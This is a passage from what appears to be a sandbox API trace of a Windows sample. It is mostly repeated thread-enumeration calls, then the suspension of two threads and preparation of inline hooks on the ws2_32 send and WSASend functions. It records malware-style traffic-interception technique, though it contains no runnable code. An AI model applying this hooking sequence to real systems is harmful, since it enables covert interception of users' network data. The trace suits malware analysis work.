Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.369] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.369] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.370] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.370] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.370] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.370] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.371] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.371] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.371] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.371] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.372] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.372] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.372] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.373] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.373] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.373] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.373] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.374] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.374] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.374] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.374] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.375] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.375] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.375] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.376] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.376] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.376] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.376] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.377] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.377] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.377] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.377] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.378] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.378] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.378] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.379] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.379] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.379] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.379] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.380] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.380] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.380] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.380] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.381] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.381] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.381] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.382] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.382] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.382] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.382] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.383] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.383] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.383] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.383] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.384] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.384] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.384] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.384] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.385] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.385] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.386] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.386] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.386] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.386] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.387] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.387] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.387] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.387] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.388] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.388] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.388] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.388] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.389] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.389] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.389] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.390] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.390] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.390] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.390] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.391] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.391] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.391] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.391] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.392] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.392] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.392] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.392] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.393] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.393] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.393] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.394] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.394] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.394] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.394] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.395] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.395] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.395] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.395] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.396] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.396] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.396] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.397] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.397] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.397] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.397] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.399] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.399] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.400] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.400] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.400] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.401] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.444] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.444] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.444] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.445] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.445] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.445] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.446] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.446] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.446] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.446] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.447] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.447] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.447] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.447] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.448] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.448] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.448] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.448] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.449] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.449] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.449] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.450] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.450] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.450] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.450] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.451] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.451] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.451] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.451] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.452] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.452] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.452] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.453] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.453] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.453] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.453] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.454] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.454] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.454] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.454] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.455] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.455] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.455] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.455] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.456] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.456] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.456] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.457] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.457] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.457] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.457] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.458] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.458] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.458] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.458] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.459] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.459] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.459] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.459] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.460] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.460] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.460] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.461] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.461] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.461] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.461] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.462] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.462] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.462] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.462] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.463] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.463] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.463] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.463] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.464] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.464] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.464] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.465] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.465] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.465] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.465] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.466] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.466] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.466] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.466] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.467] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.467] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.467] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.468] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.468] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.468] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.468] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.469] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.469] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.469] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.469] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.470] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.470] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.490] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3c0) returned 0x8c [0174.490] SuspendThread (hThread=0x8c) returned 0x0 [0174.490] CloseHandle (hObject=0x8c) returned 1 [0174.490] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x998) returned 0x8c [0174.490] SuspendThread (hThread=0x8c) returned 0x0 [0174.491] CloseHandle (hObject=0x8c) returned 1 [0174.512] CloseHandle (hObject=0x88) returned 1 [0174.512] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0174.513] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0174.513] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x204224 | out: lpflOldProtect=0x204224*=0x20) returned 1 [0174.513] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x210000 [0174.513] RtlMoveMemory (in: Destination=0x210000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x210000) [0174.513] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x204224 | out: lpflOldProtect=0x204224*=0x40) returned 1 [0174.519] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0174.519] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0174.519] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x204224 | out: lpflOldProtect=0x204224*=0x20) returned 1 [0174.519] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x230000 [0174.519] RtlMoveMemory (in: Destination=0x230000, Source=0x75bc4406, Length=0x5 | out: Destination=0x230000) [0174.520] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x204224 | out: lpflOldProtect=0x204224*=0x40) returned 1 [0174.524] GetCurrentProcessId () returned 0x5d8 [0174.524] GetCurrentThreadId () returned 0x710 [0174.524] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0174.573] Thread32First (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.573] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.574] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.574] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.574] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.575] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.575] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.575] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.575] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.576] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.576] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.576] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.577] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.577] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.577] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.577] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.578] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.578] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.578] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.578] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.579] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.579] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.579] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.579] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.580] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.580] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.580] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.581] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.581] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.581] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.581] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.582] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.582] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.582] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.582] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.583] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.583] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.583] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.584] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.584] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.584] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.584] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.585] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.585] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.585] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.585] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.586] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.586] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.586] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.587] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.587] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.587] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.587] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.588] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.588] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.588] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.589] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.589] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.589] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.589] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.590] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.590] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.590] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.591] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.591] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.591] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.591] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.592] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.592] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.592] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.592] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.593] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.593] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.593] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.594] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.594] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.594] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.594] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.595] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.595] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.595] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.595] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.596] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.596] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.596] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.597] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.597] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.597] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.597] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.598] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.598] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.598] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.598] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.599] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.599] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.599] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.600] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.600] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.600] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.600] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.601] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.601] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.601] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.601] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.602] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.602] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.602] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.603] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.603] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.603] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.603] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.604] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.604] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.604] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.605] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.605] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.605] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.605] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.606] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.606] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.606] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.606] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.607] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.607] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.607] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.608] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.608] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.608] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.608] 